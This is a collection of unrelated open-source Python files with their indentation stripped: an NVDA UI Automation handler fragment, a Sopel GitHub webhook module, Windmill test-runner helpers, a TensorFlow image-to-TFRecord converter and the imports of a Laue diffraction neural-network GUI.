lastFocus=eventHandler.lastQueuedFocusObject.UIAElement
# Ignore duplicate focus events.
# It seems that it is possible for compareElements to return True, even though the objects are different.
# Therefore, don't ignore the event if the last focus object has lost its hasKeyboardFocus state.
if self.clientObject.compareElements(sender,lastFocus) and lastFocus.currentHasKeyboardFocus:
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent("gainFocus",windowHandle=window):
return
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj or not obj.shouldAllowUIAFocusEvent:
return
eventHandler.queueEvent("gainFocus",obj)
def IUIAutomationPropertyChangedEventHandler_HandlePropertyChangedEvent(self,sender,propertyId,newValue):
# #3867: For now manually force this VARIANT type to empty to get around a nasty double free in comtypes/ctypes.
# We also don't use the value in this callback.
newValue.vt=VT_EMPTY
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
NVDAEventName=UIAPropertyIdsToNVDAEventNames.get(propertyId,None)
if not NVDAEventName:
return
if not self.isNativeUIAElement(sender):
return
window=self.getNearestWindowHandle(sender)
if window and not eventHandler.shouldAcceptEvent(NVDAEventName,windowHandle=window):
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
return
focus=api.getFocusObject()
if obj==focus:
obj=focus
eventHandler.queueEvent(NVDAEventName,obj)
def IUIAutomationNotificationEventHandler_HandleNotificationEvent(self,sender,NotificationKind,NotificationProcessing,displayString,activityId):
if not self.MTAThreadInitEvent.isSet():
# UIAHandler hasn't finished initialising yet, so just ignore this event.
return
import NVDAObjects.UIA
obj=NVDAObjects.UIA.UIA(UIAElement=sender)
if not obj:
# Sometimes notification events can be fired on a UIAElement that has no windowHandle and does not connect through parents back to the desktop.
# There is nothing we can do with these.
return
eventHandler.queueEvent("UIA_notification",obj, notificationKind=NotificationKind, notificationProcessing=NotificationProcessing, displayString=displayString, activityId=activityId)
def _isUIAWindowHelper(self,hwnd):
# UIA in NVDA's process freezes in Windows 7 and below
processID=winUser.getWindowThreadProcessID(hwnd)[0]
if windll.kernel32.GetCurrentProcessId()==processID:
return False
import NVDAObjects.window
windowClass=NVDAObjects.window.Window.normalizeWindowClassName(winUser.getClassName(hwnd))
# For certain window classes, we always want to use UIA.
if windowClass in goodUIAWindowClassNames:
return True
# allow the appModule for the window to also choose if this window is good
# An appModule should be able to override bad UIA class names as prescribed by core
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
if appModule and appModule.isGoodUIAWindow(hwnd):
return True
# There are certain window classes that just had bad UIA implementations
if windowClass in badUIAWindowClassNames:
return False
if windowClass=="NetUIHWND":
parentHwnd=winUser.getAncestor(hwnd,winUser.GA_ROOT)
# #2816: Outlook 2010 auto complete does not fire enough UIA events, IAccessible is better.
# #4056: Combo boxes in Office 2010 Options dialogs don't expose a name via UIA, but do via MSAA.
if winUser.getClassName(parentHwnd) in {"Net UI Tool Window","NUIDialog"}:
return False
# allow the appModule for the window to also choose if this window is bad
if appModule and appModule.isBadUIAWindow(hwnd):
return False
# Ask the window if it supports UIA natively
res=windll.UIAutomationCore.UiaHasServerSideProvider(hwnd)
if res:
# the window does support UIA natively, but
# Microsoft Word should not use UIA unless we can't inject or the user explicitly chose to use UIA with Microsoft word
if windowClass=="_WwG" and not (config.conf['UIA']['useInMSWordWhenAvailable'] or not appModule.helperLocalBindingHandle):
return False
return bool(res)
def isUIAWindow(self,hwnd):
now=time.time()
v=self.UIAWindowHandleCache.get(hwnd,None)
if not v or (now-v[1])>0.5:
v=self._isUIAWindowHelper(hwnd),now
self.UIAWindowHandleCache[hwnd]=v
return v[0]
def getNearestWindowHandle(self,UIAElement):
if hasattr(UIAElement,"_nearestWindowHandle"):
# Called previously. Use cached result.
return UIAElement._nearestWindowHandle
try:
processID=UIAElement.cachedProcessID
except COMError:
return None
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
# WDAG (Windows Defender application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
if appModule.appName==WDAG_PROCESS_NAME:
condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
walker=self.clientObject.createTreeWalker(condition)
else:
# Not WDAG, just walk up to the nearest valid windowHandle
walker=self.windowTreeWalker
try:
new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
except COMError:
return None
try:
window=new.cachedNativeWindowHandle
except COMError:
window=None
# Cache for future use to improve performance.
UIAElement._nearestWindowHandle=window
return window
def isNativeUIAElement(self,UIAElement):
#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
#It seems to be safe enough to retreave the cached processID, but using tree walkers or fetching other properties causes a freeze.
try:
processID=UIAElement.cachedProcessId
except COMError:
return False
if processID==windll.kernel32.GetCurrentProcessId():
return False
# Whether this is a native element depends on whether its window natively supports UIA.
windowHandle=self.getNearestWindowHandle(UIAElement)
if windowHandle:
if self.isUIAWindow(windowHandle):
return True
if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
# This is the IE 9 downloads list.
# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
# so we'd normally use MSAA for this control.
# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
# whereas its UIA implementation works correctly.
# Therefore, we must use UIA here.
return True
return False
|
webhook.py
|
# coding=utf8
"""
webhook.py - Sopel GitHub Module
Copyright 2015 Max Gurela
_______ __ __ __ __
| __|__| |_| |--.--.--.| |--.
| | | | _| | | || _ |
|_______|__|____|__|__|_____||_____|
________ __ __ __
| | | |.-----.| |--.| |--.-----.-----.| |--.-----.
| | | || -__|| _ || | _ | _ || <|__ --|
|________||_____||_____||__|__|_____|_____||__|__|_____|
"""
from __future__ import unicode_literals
from sopel import tools
from sopel.formatting import bold, color
from sopel.tools.time import get_timezone, format_time
from .formatting import get_formatted_response
from .formatting import fmt_repo
from .formatting import fmt_name
from threading import Thread
import bottle
import json
import requests
# Because I'm a horrible person
sopel_instance = None
def setup_webhook(sopel):
global sopel_instance
sopel_instance = sopel
host = sopel.config.github.webhook_host
port = sopel.config.github.webhook_port
base = StoppableWSGIRefServer(host=host, port=port)
server = Thread(target=bottle.run, kwargs={'server': base})
server.setDaemon(True)
server.start()
sopel.memory['gh_webhook_server'] = base
sopel.memory['gh_webhook_thread'] = server
conn = sopel.db.connect()
c = conn.cursor()
try:
c.execute('SELECT * FROM gh_hooks')
except Exception:
create_table(sopel, c)
conn.commit()
conn.close()
def create_table(bot, c):
primary_key = '(channel, repo_name)'
c.execute('''CREATE TABLE IF NOT EXISTS gh_hooks (
channel TEXT,
repo_name TEXT,
enabled BOOL DEFAULT 1,
url_color TINYINT DEFAULT 2,
tag_color TINYINT DEFAULT 6,
repo_color TINYINT DEFAULT 13,
name_color TINYINT DEFAULT 15,
hash_color TINYINT DEFAULT 14,
branch_color TINYINT DEFAULT 6,
PRIMARY KEY {0}
)'''.format(primary_key))
def shutdown_webhook(sopel):
global sopel_instance
sopel_instance = None
if sopel.memory.contains('gh_webhook_server'):
print('Stopping webhook server')
sopel.memory['gh_webhook_server'].stop()
sopel.memory['gh_webhook_thread'].join()
print('GitHub webhook shutdown complete')
class StoppableWSGIRefServer(bottle.ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
self.server.shutdown()
def get_targets(repo):
conn = sopel_instance.db.connect()
c = conn.cursor()
c.execute('SELECT * FROM gh_hooks WHERE repo_name = ? AND enabled = 1', (repo.lower(), ))
return c.fetchall()
@bottle.get("/webhook")
def show_hook_info():
return 'Listening for webhook connections!'
@bottle.post("/webhook")
def webhook():
event = bottle.request.headers.get('X-GitHub-Event') or 'ping'
try:
payload = bottle.request.json
except:
return bottle.abort(400, 'Something went wrong!')
if event == 'ping':
channels = get_targets(payload['repository']['full_name'])
for chan in channels:
sopel_instance.msg(chan[0], '[{}] {}: {} (Your webhook is now enabled)'.format(
fmt_repo(payload['repository']['name'], chan),
fmt_name(payload['sender']['login'], chan),
payload['zen']))
return '{"channels":' + json.dumps([chan[0] for chan in channels]) + '}'
payload['event'] = event
targets = get_targets(payload['repository']['full_name'])
for row in targets:
messages = get_formatted_response(payload, row)
# Write the formatted message(s) to the channel
for message in messages:
sopel_instance.msg(row[0], message)
return '{"channels":' + json.dumps([chan[0] for chan in targets]) + '}'
@bottle.get('/auth')
def handle_auth_response():
code = bottle.request.query.code
state = bottle.request.query.state
repo = state.split(':')[0]
channel = state.split(':')[1]
data = {'client_id': sopel_instance.config.github.client_id,
'client_secret': sopel_instance.config.github.secret,
'code': code}
raw = requests.post('https://github.com/login/oauth/access_token', data=data, headers={'Accept': 'application/json'})
try:
res = json.loads(raw.text)
if 'scope' not in res:
raise ValueError('You\'ve already completed authorization on this repo')
if 'write:repo_hook' not in res['scope']:
raise ValueError('You didn\'t allow read/write on repo hooks!')
access_token = res['access_token']
data = {
"name": "web",
"active": True,
"events": ["*"],
"config": {
"url": sopel_instance.config.github.external_url,
"content_type": "json"
}
}
raw = requests.post('https://api.github.com/repos/{}/hooks?access_token={}'.format(repo, access_token), data=json.dumps(data))
res = json.loads(raw.text)
if 'ping_url' not in res:
if 'errors' in res:
raise ValueError(', '.join([error['message'] for error in res['errors']]))
else:
raise ValueError('Webhook creation failed, try again.')
raw = requests.get(res['ping_url'] + '?access_token={}'.format(access_token))
title = 'Done!'
header = 'Webhook setup complete!'
body = 'That was simple, right?! You should be seeing a completion message in {} any second now'.format(channel)
flair = 'There\'s no way it was that easy... things are never this easy...'
except Exception as e:
title = 'Error!'
header = 'Webhook setup failed!'
body = 'Please try using the link in {} again, something went wrong!'.format(channel)
flair = str(e)
page = '''
<!DOCTYPE html>
<html>
<head>
<title>{title}</title>
<style>
body {{
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}}
</style>
</head>
<body>
<h1>{header}</h1>
<p>{body}</p>
<small><em>{flair}</em></small>
</body>
</html>
'''
return page.format(title=title, header=header, body=body, flair=flair)
|
shell_objects.py
|
#!/usr/bin/env python
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
from windmill.dep import uuid
# import sys, os, logging, re
import os, logging, re
from time import sleep
# from windmill.authoring import frame
from threading import Thread
from windmill.dep import functest
logger = logging.getLogger(__name__)
jsonrpc_client = windmill.tools.make_jsonrpc_client()
xmlrpc_client = windmill.tools.make_xmlrpc_client()
from StringIO import StringIO
test_stream_object = StringIO()
def clear_queue():
"""Clear the Service's current queue of tests/actions."""
try:
xmlrpc_client.clear_queue()
except Exception, e:
logger.debug(type(e).__name__+':'+e.message)
windmill.settings['controllers'] = []
def start_firefox():
"""Start the Firefox web browser configured for windmill"""
controller = windmill.browser.get_firefox_controller()
controller.start()
#print 'Started '+str(controller.command)
logger.info(str(controller.command))
windmill.settings['controllers'].append(controller)
return controller
def start_ie():
"""Start the Internet Explorer web browser configured for windmill"""
controller = windmill.browser.get_ie_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def start_safari():
"""Start the Safari web browser configured for windmill"""
controller = windmill.browser.get_safari_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def start_chrome():
"""Start the Chrome web browser configured for windmill"""
controller = windmill.browser.get_chrome_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def load_json_test_file(filename):
"""Run the json test files passed to this function"""
test_strings = re.compile("\{.*\}").findall(open(filename, 'r').read())
jsonrpc_client.start_suite(filename.split(os.path.sep)[-1])
jsonrpc_client.run_json_tests(test_strings)
jsonrpc_client.stop_suite()
logger.info('Added tests from %s' % filename)
def show_queue():
"""Return the current queue of tests and commands in windmill"""
return windmill.settings['shell_objects']['httpd'].controller_queue.queue
def do_test(filename, load=False, threaded=True):
"""Run or load the test file or directory passed to this function"""
windmill.block_exit = True
if ',' in filename:
for f in filename.split(','):
do_test(f, load)
return None
def json_test(filename):
if os.path.isfile(filename) and not os.path.isfile(os.path.join(os.path.dirname(filename), '__init__.py')):
return None, load_json_test_file(filename)
else:
return os.path.dirname(os.path.abspath(filename)), [
f for f in filename.split('/') if f != ''][-1].split('.')[0]
def python_test(filename):
return os.path.abspath(filename), ''
def directory_test(filename):
return os.path.abspath(filename), ''
module_name, filter_string = {
'py': python_test,
'json': json_test
}.get(filename.split('.')[-1],directory_test)(filename)
def run_functest():
if load:
functest.registry['browser_debugging'] = "True"
xmlrpc_client.add_command({
'method': 'commands.setOptions',
'params': {'runTests':False, 'priority':'normal'}
})
functest.global_settings.test_filter = filter_string
from windmill.authoring import WindmillFunctestRunner, post_collector
functest.collector.Collector.post_collection_functions.append(post_collector)
functest.run_framework(test_args=[module_name], test_runner=WindmillFunctestRunner())
if load:
xmlrpc_client.add_command({
'method': 'commands.setOptions',
'params': {'runTests':True, 'priority':'normal'}
})
windmill.block_exit = False
if module_name is not None and threaded:
run_thread = Thread(target=run_functest)
getattr(run_thread, 'setDaemon', lambda x: x)(True)
from windmill.bin import admin_lib
admin_lib.on_ide_awake.append(run_thread.start)
return run_thread
elif module_name:
x = []
from windmill.bin import admin_lib
admin_lib.on_ide_awake.append(lambda : x.append(True))
while len(x) is 0:
sleep(1)
run_functest()
run_test = lambda filename: do_test(filename, load=False, threaded=True)
run_test.__name__ = 'run_test'
run_test.__doc__ = "Run the test file or directory passed to this function"
load_test = lambda filename: do_test(filename, load=True, threaded=True)
load_test.__name__ = 'load_test'
load_test.__doc__ = "Load the test file or directory passed to this function"
def run_js_tests(js_dir, test_filter=None, phase=None):
import windmill
from windmill.dep import wsgi_fileserver
from windmill.server import wsgi
windmill.js_framework_active = True
js_dir = os.path.abspath(os.path.expanduser(js_dir))
WSGIFileServerApplication = wsgi_fileserver.WSGIFileServerApplication
application = WSGIFileServerApplication(root_path=os.path.abspath(js_dir), mount_point='/windmill-jstest/')
wsgi.add_namespace('windmill-jstest', application)
# Build list of files and send to IDE
# base_url = windmill.settings['TEST_URL'] + '/windmill-jstest'
base_url = '/windmill-jstest'
js_files = []
def parse_files(x, directory, files):
if not os.path.split(directory)[-1].startswith('.'):
additional_dir = directory.replace(js_dir, '')
js_files.extend([additional_dir + '/' + f for f in files if f.endswith('.js')])
os.path.walk(js_dir, parse_files, 'x')
kwargs = {}
kwargs['files'] = [base_url + f for f in js_files ]
kwargs['uuid'] = str(uuid.uuid1())
if test_filter:
kwargs['filter'] = test_filter
if phase:
kwargs['phase'] = phase
xmlrpc_client.add_command({
'method':'commands.setOptions',
'params': {'scriptAppendOnly': windmill.settings['SCRIPT_APPEND_ONLY']}
})
xmlrpc_client.add_command({'method': 'commands.jsTests', 'params': kwargs})
def load_extensions_dir(dirname):
"""Mount the directory and send all javascript file links to the IDE in order to execute those test urls under the jsUnit framework"""
# Mount the fileserver application for tests
from windmill.dep import wsgi_fileserver
WSGIFileServerApplication = wsgi_fileserver.WSGIFileServerApplication
application = WSGIFileServerApplication(root_path=os.path.abspath(dirname), mount_point='/windmill-extentions/')
from windmill.server import wsgi
wsgi.add_namespace('windmill-extentions', application)
# Build list of files and send to IDE
base_url = windmill.settings['TEST_URL'] + '/windmill-extentions'
js_files = []
def parse_files(x, directory, files):
if not os.path.split(directory)[-1].startswith('.'):
additional_dir = directory.replace(dirname, '')
js_files.extend([additional_dir + '/' + f for f in files if f.endswith('.js')])
os.path.walk(dirname, parse_files, 'x')
xmlrpc_client.add_command({
'method': 'commands.loadExtensions',
'params': {'extensions':[base_url + f for f in js_files ]}
})
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
lauetoolsneuralnetwork.py
|
# -*- coding: utf-8 -*-
"""
Created on June 18 06:54:04 2021
GUI routine for Laue neural network training and prediction
@author: Ravi raj purohit PURUSHOTTAM RAJ PUROHIT (purushot@esrf.fr)
@guide: jean-Sebastien MICHA (micha@esrf.fr)
Credits:
Lattice and symmetry routines are extracted and adapted from the PYMICRO and Xrayutilities repository
TODO:
1. HDF5 file format output instead of pickle --> better data handling (check out PYMICRO)
2. Notebook to post process the results (choice of bin width, data selectivity, etc...)
3. Dynamic Multi processing variables ?
#TODO
# Write a function that looks for pixels with no indexation having atleast 6 neighbors indexed
# idea is to index with their rotation matrix ?
# Also write a function to rearrange matricies of each pixel to have complete grain representation
"""
__author__ = "Ravi raj purohit PURUSHOTTAM RAJ PUROHIT, CRG-IF BM32 @ ESRF"
import warnings
warnings.filterwarnings('ignore')
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import logging
logger = logging.getLogger()
old_level = logger.level
logger.setLevel(100)
try:
import pkg_resources # part of setuptools
version_package = pkg_resources.require("lauetoolsnn")[0].version
except:
version_package = "3.0.0"
frame_title = "Laue Neural-Network model- v3 @Ravi @Jean-Sebastien \n@author: Ravi raj purohit PURUSHOTTAM RAJ PUROHIT (purushot@esrf.fr) \n@guide: Jean-Sebastien MICHA (micha@esrf.fr)"
import matplotlib
matplotlib.use('Qt5Agg')
matplotlib.rcParams.update({'font.size': 14})
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
from matplotlib.widgets import RectangleSelector
from matplotlib import cm
import numpy as np
import itertools
import re
import glob
import _pickle as cPickle
import time, datetime
import sys
import inspect
import threading
import multiprocessing as multip
from multiprocessing import Process, Queue, cpu_count
import ast, configparser
from sklearn.metrics import classification_report
from skimage.transform import (hough_line, hough_line_peaks)
from PyQt5 import QtCore#, QtGui
from PyQt5.QtCore import QSettings
